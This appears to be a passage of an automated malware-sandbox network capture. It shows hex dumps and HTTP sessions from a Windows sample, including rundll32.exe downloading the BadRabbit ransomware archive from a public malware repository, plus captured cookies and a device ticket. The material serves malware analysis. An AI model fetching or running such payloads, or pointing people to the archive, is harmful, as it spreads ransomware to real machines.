                                                                                                                                                            2022-09-29 12:46:57 UTC38588INData Raw: 20 6a 5b d3 14 76 ba 3f 41 47 9d 45 4c 14 86 7f 02 77 7c cc 51 e0 d7 e5 e7 2e 84 cb 39 19 06 7c 42 86 72 5b ca 4b 79 da d8 2d 2d 85 30 67 06 0e 90 0f d5 4e 42 7c 12 06 27 c2 ed bf 55 ae 7a 51 d6 de bf c9 8e b0 95 7b 59 e8 89 01 d2 8c 75 a3 5d 10 ef 63 8a 63 35 da d3 67 85 21 36 3b 66 29 1d 4c 10 85 c9 7d f9 82 ab 23 91 91 44 da 54 2e cd e2 33 c0 57 6d 7f 44 ec 53 1c ad f8 ac 94 33 5b 2b 1f b8 70 44 57 2a fb 76 ea f7 39 ff 45 e9 71 4e 8e 6f 21 a0 95 9d d5 e6 26 91 4a 6f d5 06 78 99 d7 ec b5 53 b6 28 64 0b 5b 18 9c 7a a1 f8 0c b6 fc dd 19 49 48 dd cf 4f da 37 ad ba 0a 2c 8e 62 cb 0a fe 92 2d f0 41 be d9 ef 63 8f 42 d3 a5 1c 5d 95 9b 60 3a ea dc d4 ec f6 1b 8b e4 0d 31 e3 35 fb 29 cc 7a 9d 0a 61 b7 e9 79 a4 a2 ed 88 f4 82 a3 5e ed 7c 9b 15 cb f9 bc 8f 43 12
                                                                                                                                                            Data Ascii: j[v?AGELw|Q.9|Br[Ky--0gNB|'UzQ{Yu]cc5g!6;f)L}#DT.3WmDS3[+pDW*v9EqNo!&JoxS(d[zIHO7,b-AcB]`:15)zay^|C
                                                                                                                                                            2022-09-29 12:46:57 UTC38604INData Raw: f5 19 bb 37 94 5b bd a3 c7 eb 87 c0 8f ea 5e bb ec 1b 24 80 9b aa 2a 29 a6 84 88 16 72 c1 80 26 ae e4 0f e2 b0 1a a8 9b 8e 99 6c f5 2b bd 32 e8 a5 df 06 0b cd f6 7a 8b b8 ee 42 3c 3b d2 d1 f8 8a df 34 14 77 3b 39 9d f5 d1 44 7b bb 1f 46 ca 6b c0 7a 8c e6 dc 7f 4f ad 27 93 49 1d 69 51 47 ab 20 e4 e5 e1 b2 49 70 7a a1 60 24 83 fc c5 69 03 e5 cc 69 dd 0a 8c c3 e5 55 53 f0 e7 1c eb c6 5b 27 90 17 87 a5 1e a8 9e 68 81 b1 6e 18 46 d4 2b bd de f1 97 28 bd ce af 3b e0 28 05 30 2b dc ba 10 93 e6 f6 a2 16 a5 76 72 70 98 35 e6 bd a2 ad c6 b0 eb 75 12 26 0f c0 ee 40 63 1a 6b 57 a7 31 4b 82 3d 90 f4 05 04 9e c9 26 39 8c a6 dd f2 ba 10 cc 02 9b 78 ca d2 ec 9b be dd b0 e4 2f e1 8f 42 f4 82 af 1f a3 0f e7 50 f9 a4 1d ef 06 2d 5a b0 54 9a 75 14 07 f2 a9 67 aa 2f 6a a3 5c
                                                                                                                                                            Data Ascii: 7[^$*)r&l+2zB<;4w;9D{FkzO'IiQG Ipz`$iiUS['hnF+(;(0+vrp5u&@ckW1K=&9x/BP-ZTug/j\
                                                                                                                                                            2022-09-29 12:46:57 UTC38620INData Raw: ca ea a1 2d 75 b0 19 3c 8c 4a 3c 06 10 11 06 e6 6a 3f 60 30 70 fb e5 ea 53 4c fc c1 a5 3f a3 33 f0 28 8d 3b 4b 89 5f ef 3e d9 b8 1c be 97 1e e8 f2 ab 7f 61 3d 43 0d 92 0e 5f 40 82 ff e7 e6 84 33 b4 d5 83 09 0e 48 79 33 fe 51 aa 08 fe fe 06 15 89 e0 7c 75 ed fe 99 5b 81 1c 81 95 f0 2d 6b a8 1f ff 71 f3 94 b7 1a cf e9 82 85 5b 24 e9 ed 9e dd f1 38 ec 79 e1 7f 73 ef 3e 8f 71 a9 06 84 53 ed 21 8f 81 45 62 45 38 2a b5 cf 98 23 54 6a 3a c2 f4 dd 6b 22 78 ec ec d9 d8 4d 9a 59 13 0d 57 e9 3c a1 39 fe 92 ad 58 98 18 0e 55 f1 86 28 31 a2 6e 3c bb 90 7e 8e 14 7f d3 8c 78 43 00 20 fe 05 40 bc 01 63 6b e8 32 6f 52 4b 19 d0 ab 3c a2 8c b5 b9 19 12 e8 4f 06 fe 5c 60 9c f8 1b 26 d5 65 b0 40 14 ea a7 b9 7c e4 ab 07 e8 b1 76 03 02 5f e8 48 d1 84 c4 96 d8 8d 8f c2 11 03 75
                                                                                                                                                            Data Ascii: -u<J<j?`0pSL?3(;K_>a=C_@3Hy3Q|u[-kq[$8ys>qS!EbE8*#Tj:k"xMYW<9XU(1n<~xC @ck2oRK<O\`&e@|v_Hu
                                                                                                                                                            2022-09-29 12:46:57 UTC38636INData Raw: 52 17 55 a4 43 09 06 7e 3a 7d 82 ce d4 05 34 23 ce d1 67 77 09 83 09 76 6c a7 9d c7 3f 21 dd 00 cf 5f 2e b6 ec aa d6 b9 bb 0f 02 b0 54 26 dd 89 7d 73 63 b0 8f 44 24 e4 06 d2 cd f6 ec 34 a9 9e a2 64 b1 5e 6c 4a 9e da f4 82 e1 94 db 6b e6 c3 2e 82 73 0d a4 6e cb bd 11 65 1f 68 e3 91 db 2e 0f 7e 3a 8d a0 9c 07 d7 4e 7a 9f 64 da 58 02 84 b1 73 b9 f3 e7 88 44 65 a5 05 24 5c 30 08 54 f8 38 04 2a 7b e3 6f fb 2e 5a 85 46 5a 2f a7 40 d1 5b d2 58 ca 63 65 52 75 ec 09 70 4d 81 82 19 82 ec 63 23 31 18 d1 03 4a 1b d9 f8 da 13 8d 0e 2c 14 17 e0 2d a2 ba 46 83 0c 16 b4 6a 42 16 67 fc d5 d4 51 9d 8b cd 52 ad 17 e0 47 58 e2 c0 96 63 bf 04 6b 77 60 09 c6 1c d4 43 6e 5e 35 bd df 52 60 6d 6a 4d a6 96 b4 da a2 8a 08 50 b7 ba 75 f9 70 37 87 4b 59 d1 ea 6d 97 ad 89 bf 61 d7 99
                                                                                                                                                            Data Ascii: RUC~:}4#gwvl?!_.T&}scD$4d^lJk.sneh.~:NzdXsDe$\0T8*{o.ZFZ/@[XceRupMc#1J,-FjBgQRGXckw`Cn^5R`mjMPup7KYma
                                                                                                                                                            2022-09-29 12:46:57 UTC38652INData Raw: 06 4e 72 bf f8 5c a6 65 95 70 02 af 5c 43 bb 5a df ad 63 6f 11 0e 88 d3 f3 84 e9 d0 8e 87 ed ad a4 7b 49 b5 74 1b dc fa c4 3a ab 2b b1 53 6d 8c 66 31 0a 9d 54 d9 2a 9c 03 71 eb d5 1c dc e9 1b 4e 7b 83 70 60 ef 3f 31 db 49 cc 6a 16 ca 3b fe 43 d5 b1 0a 58 12 45 cd af 39 53 1d 4e fe 11 53 a5 35 4a fe 62 ff 80 e2 91 21 98 c4 6f 81 52 32 70 fd eb b7 73 cf ff a4 02 9e 75 d2 dc 9a a1 f1 ee d5 1d ce f8 c7 2f 2c 4c 1b c3 d1 39 c9 cc 29 bb 7a 70 89 cd e6 42 4a d3 05 2a b0 f3 30 03 63 93 f2 5e 1e 07 4f 13 83 33 4c 1f 09 7e fb c6 92 e3 36 7c 8b 46 f8 e7 4f 06 c4 c4 f7 be af 18 4c 9b ff b1 a3 f7 20 59 85 cd 87 5b fb 3e 50 23 e5 bd bf 21 d4 d4 f5 7f e0 d2 4f a5 f0 29 f0 d1 05 a0 d2 14 89 a2 f6 d0 36 22 94 54 f6 13 6f 03 7d 0c 83 cd c4 3b 22 dd 4d 61 61 d7 f6 c8 a6 ac
                                                                                                                                                            Data Ascii: Nr\ep\CZco{It:+Smf1T*qN{p`?1Ij;CXE9SNS5Jb!oR2psu/,L9)zpBJ*0c^O3L~6|FOL Y[>P#!O)6"To};"Maa
                                                                                                                                                            2022-09-29 12:46:57 UTC38668INData Raw: e5 ab bf f1 59 8c ea b7 bd 6a f1 b9 57 73 3f b0 b8 e7 8d df 46 47 a3 cd 0e b2 7b ca d9 87 a0 db e2 d0 cb 92 38 cf 69 5e 59 39 8f 9c 3b 24 df 75 26 7a b8 4b 96 f5 c6 65 bb 71 ad ea b4 6b 0b 7f 45 10 b5 46 52 d2 e4 3c 36 c7 6c 28 c1 40 29 7e 89 ee 56 39 57 20 4a df 30 bc 7b df ac 37 66 73 19 63 69 f3 a6 f0 69 48 e5 73 a4 ea d8 79 62 48 24 c2 51 a7 4b cf f4 13 2b a0 6e 84 67 3b 91 ae 55 90 94 46 93 56 c7 d0 88 d0 18 6e 75 b7 b3 96 e3 43 09 4a f7 08 ac 74 63 b0 12 30 ec 3d 9d e4 62 d1 96 30 b8 69 22 48 1a 98 72 ac 90 59 a5 fb 86 2b a7 41 b2 6b 56 af 38 f7 31 2a ce 31 e2 05 a4 dc 01 d4 49 0d 0b 20 d0 00 99 f9 7b 0e f0 a5 80 11 84 ad 92 79 5e 38 9f 8b fb dc a4 77 f2 52 8c c8 c3 ff 1a 74 80 72 47 ff cf e6 a8 c5 e6 83 55 74 6e 40 e5 91 e1 a0 78 18 f9 73 2d 7e 08
                                                                                                                                                            Data Ascii: YjWs?FG{8i^Y9;$u&zKeqkEFR<6l(@)~V9W J0{7fsciiHsybH$QK+ng;UFVnuCJtc0=b0i"HrY+AkV81*1I {y^8wRtrGUtn@xs-~


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            153192.168.2.6498595.255.255.80443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:47:11 UTC38669OUTGET /1001 HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept: */*
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                            Host: yandex.ru
                                                                                                                                                            Cookie: _yasc=WOxcuHWRth/MOesDrBOKQ05cqblg3Pr6HOsR8h6u0sZy4aMO; is_gdpr_b=CPe0cBDfjAEYAQ==; is_gdpr=1
                                                                                                                                                            2022-09-29 12:47:11 UTC38670INHTTP/1.1 404 Not Found
                                                                                                                                                            Accept-CH: Viewport-Width, DPR, Device-Memory, RTT, Downlink, ECT
                                                                                                                                                            Accept-CH-Lifetime: 31536000
                                                                                                                                                            Cache-Control: no-cache,no-store,max-age=0,must-revalidate
                                                                                                                                                            Connection: Close
                                                                                                                                                            Content-Length: 17424
                                                                                                                                                            Content-Security-Policy-Report-Only: connect-src https://*.mc.yandex.ru https://adstat.yandex.ru https://mc.admetrica.ru https://mc.yandex.ru https://yabs.yandex.ru https://yandex.ru;default-src 'none';frame-src https://*.ya.ru https://*.yandex.ru https://mc.yandex.md https://mc.yandex.ru https://ya.ru https://yandex.ru;img-src 'self' data: https://*.mc.yandex.ru https://*.verify.yandex.ru https://*.ya.ru https://*.yandex.ru https://adstat.yandex.ru https://avatars.mds.yandex.net https://favicon.yandex.net https://mc.admetrica.ru https://mc.yandex.com https://mc.yandex.ru https://ya.ru https://yabs.yandex.ru https://yandex.ru https://yastatic.net;report-uri https://csp.yandex.net/csp?project=morda&from=morda.intercept404.ru&showid=1664455631.63025.98764.78996&h=stable-morda-any-sas-yp-12&yandexuid=4925462581664455631;script-src 'unsafe-inline' https://*.mc.yandex.ru https://adstat.yandex.ru https://mc.yandex.ru https://yandex.ru https://yastatic.net;style-src 'unsafe-inline' https://yastatic.net
                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:47:11 GMT
                                                                                                                                                            Expires: Thu, 29 Sep 2022 12:47:12 GMT
                                                                                                                                                            Last-Modified: Thu, 29 Sep 2022 12:47:12 GMT
                                                                                                                                                            NEL: {"report_to": "network-errors", "max_age": 100, "success_fraction": 0.001, "failure_fraction": 0.1}
                                                                                                                                                            P3P: policyref="/w3c/p3p.xml", CP="NON DSP ADM DEV PSD IVDo OUR IND STP PHY PRE NAV UNI"
                                                                                                                                                            Report-To: { "group": "network-errors", "max_age": 100, "endpoints": [{"url": "https://dr.yandex.net/nel", "priority": 1}, {"url": "https://dr2.yandex.net/nel", "priority": 2}]}
                                                                                                                                                            Set-Cookie: i=Efg1OIX2vzI47rWXLKPVMq+V8jZiWcIdTpSkrYBxnXD9Up1BCxj+54DWUYkX8s0PO/0IYQAlWL5NjEZTnRflXyxFBKA=; Expires=Sat, 28-Sep-2024 12:47:11 GMT; Domain=.yandex.ru; Path=/; Secure; HttpOnly
                                                                                                                                                            Vary: Cookie,Accept-Language,Accept-Encoding
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            2022-09-29 12:47:11 UTC38672INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 20 20 63 6c 61 73 73 3d 22 69 2d 75 61 5f 6a 73 5f 6e 6f 20 69 2d 75 61 5f 63 73 73 5f 73 74 61 6e 64 61 72 74 20 69 2d 75 61 5f 62 72 6f 77 73 65 72 5f 75 6e 6b 6e 6f 77 6e 20 69 2d 75 61 5f 62 72 6f 77 73 65 72 2d 65 6e 67 69 6e 65 5f 75 6e 6b 6e 6f 77 6e 20 69 2d 75 61 5f 62 72 6f 77 73 65 72 5f 64 65 73 6b 74 6f 70 20 69 2d 75 61 5f 70 6c 61 74 66 6f 72 6d 5f 77 69 6e 64 6f 77 73 22 20 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 20 20 78 6d 6c 6e 73 3a 6f 67 3d 22 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73
                                                                                                                                                            Data Ascii: <!DOCTYPE html><html class="i-ua_js_no i-ua_css_standart i-ua_browser_unknown i-ua_browser-user_unknown i-ua_browser_desktop i-ua_platform_windows" lang="ru"><head xmlns:og="http://ogp.me/ns#"><meta http-equiv='Content-Type' content='text/html;chars
                                                                                                                                                            2022-09-29 12:47:11 UTC38678INData Raw: 75 6f 74 3b 75 72 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 2f 2f 79 61 6e 64 65 78 2e 72 75 2f 73 75 67 67 65 73 74 2f 73 75 67 67 65 73 74 2d 79 61 2e 63 67 69 3f 73 72 76 3d 6d 6f 72 64 61 5f 72 75 5f 64 65 73 6b 74 6f 70 26 61 6d 70 3b 77 69 7a 3d 54 72 57 74 68 26 61 6d 70 3b 75 69 6c 3d 72 75 26 61 6d 70 3b 66 61 63 74 3d 31 26 61 6d 70 3b 76 3d 34 26 61 6d 70 3b 69 63 6f 6e 3d 31 26 61 6d 70 3b 6c 72 3d 32 31 33 26 61 6d 70 3b 68 6c 3d 31 26 61 6d 70 3b 62 65 6d 6a 73 6f 6e 3d 30 26 61 6d 70 3b 68 74 6d 6c 3d 31 26 61 6d 70 3b 70 6c 61 74 66 6f 72 6d 3d 64 65 73 6b 74 6f 70 26 61 6d 70 3b 72 69 63 68 5f 6e 61 76 3d 31 26 61 6d 70 3b 73 68 6f 77 5f 65 78 70 65 72 69 6d 65 6e 74 3d 32 32 32 26 61 6d 70 3b 73 68 6f 77 5f 65 78 70 65 72 69 6d 65 6e 74
                                                                                                                                                            Data Ascii: uot;url&quot;:&quot;//yandex.ru/suggest/suggest-ya.cgi?srv=morda_ru_desktop&amp;wiz=TrWth&amp;uil=ru&amp;fact=1&amp;v=4&amp;icon=1&amp;lr=213&amp;hl=1&amp;bemjson=0&amp;html=1&amp;platform=desktop&amp;rich_nav=1&amp;show_experiment=222&amp;show_experiment
                                                                                                                                                            2022-09-29 12:47:11 UTC38680INData Raw: 6c 3d 22 d0 97 d0 b0 d0 bf d1 80 d0 be d1 81 22 20 69 64 3d 22 74 65 78 74 22 20 6d 61 78 6c 65 6e 67 74 68 3d 22 34 30 30 22 20 6e 61 6d 65 3d 22 74 65 78 74 22 2f 3e 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 27 73 65 61 72 63 68 32 5f 5f 62 75 74 74 6f 6e 27 3e 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 74 74 6f 6e 20 6d 69 6e 69 2d 73 75 67 67 65 73 74 5f 5f 62 75 74 74 6f 6e 20 62 75 74 74 6f 6e 5f 74 68 65 6d 65 5f 73 65 61 72 63 68 20 62 75 74 74 6f 6e 5f 73 69 7a 65 5f 73 65 61 72 63 68 20 69 2d 62 65 6d 22 20 64 61 74 61 2d 62 65 6d 3d 22 7b 26 71 75 6f 74 3b 62 75 74 74 6f 6e 26 71 75 6f 74 3b 3a 7b 7d 7d 22 20 74 61 62 69 6e 64 65 78 3d 22 2d 31 22 20 72 6f 6c 65 3d 22 62 75 74 74 6f 6e
                                                                                                                                                            Data Ascii: l="" id="text" maxlength="400" name="text"/></span></span></div><div class='search2__button'><button class="button mini-suggest__button button_theme_search button_size_search i-bem" data-bem="{&quot;button&quot;:{}}" tabindex="-1" role="button
                                                                                                                                                            2022-09-29 12:47:11 UTC38686INData Raw: 77 65 64 3d 22 31 22 3e d0 9a d0 be d0 bc d0 bf d0 b0 d0 bd d0 b8 d1 8f 3c 2f 61 3e 3c 61 20 63 6c 61 73 73 3d 22 68 6f 6d 65 2d 6c 69 6e 6b 20 66 6f 6f 74 5f 5f 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 79 61 6e 64 65 78 2e 63 6f 6d 2f 63 6f 6d 70 61 6e 79 2f 22 20 64 61 74 61 2d 73 74 61 74 6c 6f 67 3d 22 61 62 6f 75 74 22 20 64 61 74 61 2d 73 74 61 74 6c 6f 67 2d 73 68 6f 77 65 64 3d 22 31 22 3e 41 62 6f 75 74 3c 2f 61 3e c2 a9 c2 a0 3c 61 20 63 6c 61 73 73 3d 22 68 6f 6d 65 2d 6c 69 6e 6b 20 66 6f 6f 74 5f 5f 6c 69 6e 6b 22 20 68 72 65 66 3d 22 2f 2f 79 61 2e 72 75 2f 22 20 64 61 74 61 2d 73 74 61 74 6c 6f 67 3d 22 79 61 6e 64 65 78 22 20 64 61 74 61 2d 73 74 61 74 6c 6f 67 2d 73 68 6f 77 65 64 3d 22 31 22 3e d0 af d0 bd d0 b4 d0 b5
                                                                                                                                                            Data Ascii: wed="1"></a><a class="home-link foot__link" href="https://yandex.com/company/" data-statlog="about" data-statlog-showed="1">About</a><a class="home-link foot__link" href="//ya.ru/" data-statlog="yandex" data-statlog-showed="1">


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            154192.168.2.649871104.208.16.94443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:47:31 UTC38689OUTPOST /Telemetry.Request HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            User-Agent: MSDW
                                                                                                                                                            MSA_DeviceTicket: t=EwC4AlN5BAAUx7kvJOvlZVsOh3du+AzMGpNViggAAcPkwu5CuAB7SMBMSR0vg4T2GTS736uQgZubBU70HwG+3eCDoCG4GUM8sTsgEBWu3nY3OtYeS4vzBd8BfrRg6yTBJpfLJjVhq6RpmRjIeeXuvrNOQr4a7wekuEm1aJWEsa4Pc+hZQ6fZaRBbOQsOVNRIqNVE8z9M1agLY9OcqvuEiDf//52Usd04foxLkWDFM80/1MM3M9wm0fC2sMtlRfy9Ue1IXWTUZXxpDsAc9WU97zBc19rHNDaxcZx1tSb/4XgmU9MUbgs1P8Qx6IelPdLjVy6vPJO+w4qkm2ENvWoNim3llQsv7LYevPNeYEBGMEsFMS1J+lLt+ZBQ/Hb+j7gDZgAACNk64fIdJpuXiAHCgAEWhQzyBn3+QDBdXX5NhaVxezC6TMcsfJefJLmfMIT3USPrihuwpRXekBx90tw4/fxdtAJX5VCFrinVPSPU6v7h/UBkETTfEgWc9YERODxnZvi/zpyJWFL1b9MTYTccha+VPv30gT9w85kxi7Jc0eKOEl+1wYWAhRnVINRSgK/mNlsVDRqcxsKrE0OpLt9K5EJigzDdhF8oM0ASLhkSDZTk3Xczz+xIUGLjAtVmYKvsePuE3jU6qNyNWGgIxJnUPdQZ58wnoBemECWLsa4hi2OBya5LqElwkPAzn8AEBaz61HrlFQsB8Oit8+pOGLQnjFp2PGpi7cqYHg6YkjHvzdu+/YD2maMJsolZPZTi4OzkN8C4EwCSQzC1g37gcT1ctrND2wl0tT9s4Bg+kGgLVVOOwoQscbl+Qlw8n6TyyimxMO4F9eX/bXyTSj7EoBX3dOzT5uIvoESsADRjr2FcezrZKIY0c5WzVg1qTbE0hrgBj2NchP7lSR2jX9USydn2qQqIuZQhpLgB&p=
                                                                                                                                                            Content-Length: 4707
                                                                                                                                                            Host: watson.telemetry.microsoft.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            155192.168.2.64988313.89.179.12443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:47:36 UTC38690OUTPOST /Telemetry.Request HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            User-Agent: MSDW
                                                                                                                                                            MSA_DeviceTicket: t=EwC4AlN5BAAUx7kvJOvlZVsOh3du+AzMGpNViggAAcPkwu5CuAB7SMBMSR0vg4T2GTS736uQgZubBU70HwG+3eCDoCG4GUM8sTsgEBWu3nY3OtYeS4vzBd8BfrRg6yTBJpfLJjVhq6RpmRjIeeXuvrNOQr4a7wekuEm1aJWEsa4Pc+hZQ6fZaRBbOQsOVNRIqNVE8z9M1agLY9OcqvuEiDf//52Usd04foxLkWDFM80/1MM3M9wm0fC2sMtlRfy9Ue1IXWTUZXxpDsAc9WU97zBc19rHNDaxcZx1tSb/4XgmU9MUbgs1P8Qx6IelPdLjVy6vPJO+w4qkm2ENvWoNim3llQsv7LYevPNeYEBGMEsFMS1J+lLt+ZBQ/Hb+j7gDZgAACNk64fIdJpuXiAHCgAEWhQzyBn3+QDBdXX5NhaVxezC6TMcsfJefJLmfMIT3USPrihuwpRXekBx90tw4/fxdtAJX5VCFrinVPSPU6v7h/UBkETTfEgWc9YERODxnZvi/zpyJWFL1b9MTYTccha+VPv30gT9w85kxi7Jc0eKOEl+1wYWAhRnVINRSgK/mNlsVDRqcxsKrE0OpLt9K5EJigzDdhF8oM0ASLhkSDZTk3Xczz+xIUGLjAtVmYKvsePuE3jU6qNyNWGgIxJnUPdQZ58wnoBemECWLsa4hi2OBya5LqElwkPAzn8AEBaz61HrlFQsB8Oit8+pOGLQnjFp2PGpi7cqYHg6YkjHvzdu+/YD2maMJsolZPZTi4OzkN8C4EwCSQzC1g37gcT1ctrND2wl0tT9s4Bg+kGgLVVOOwoQscbl+Qlw8n6TyyimxMO4F9eX/bXyTSj7EoBX3dOzT5uIvoESsADRjr2FcezrZKIY0c5WzVg1qTbE0hrgBj2NchP7lSR2jX9USydn2qQqIuZQhpLgB&p=
                                                                                                                                                            Content-Length: 4597
                                                                                                                                                            Host: watson.telemetry.microsoft.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            156192.168.2.649892140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:47:39 UTC38691OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/BadRabbit.zip HTTP/1.1
                                                                                                                                                            Host: github.com
                                                                                                                                                            Connection: Keep-Alive


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            157140.82.121.4443192.168.2.649892C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:47:39 UTC38691INHTTP/1.1 302 Found
                                                                                                                                                            Server: GitHub.com
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:46:04 GMT
                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                            Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                            Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                            Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                            2022-09-29 12:47:39 UTC38692INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            158192.168.2.649895185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:47:40 UTC38693OUTGET /Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip HTTP/1.1
                                                                                                                                                            Host: raw.githubusercontent.com
                                                                                                                                                            Connection: Keep-Alive


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            159185.199.108.133443192.168.2.649895C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:47:40 UTC38693INHTTP/1.1 200 OK
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 402632
                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                            Content-Type: application/zip
                                                                                                                                                            ETag: "004f09a50a54351833511d1b99db3436b26a72d8e149d6c13dd20a27fe83f3a9"
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            X-GitHub-Request-Id: 081E:1220:100920B:1104BA2:633592FF
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:47:40 GMT
                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                            X-Served-By: cache-mxp6924-MXP
                                                                                                                                                            X-Cache: HIT
                                                                                                                                                            X-Cache-Hits: 1
                                                                                                                                                            X-Timer: S1664455660.079379,VS0,VE1
                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            X-Fastly-Request-ID: 6d7c83898ee3e46c0dcfef5762a1cde54ca5995d
                                                                                                                                                            Expires: Thu, 29 Sep 2022 12:52:40 GMT
                                                                                                                                                            Source-Age: 236
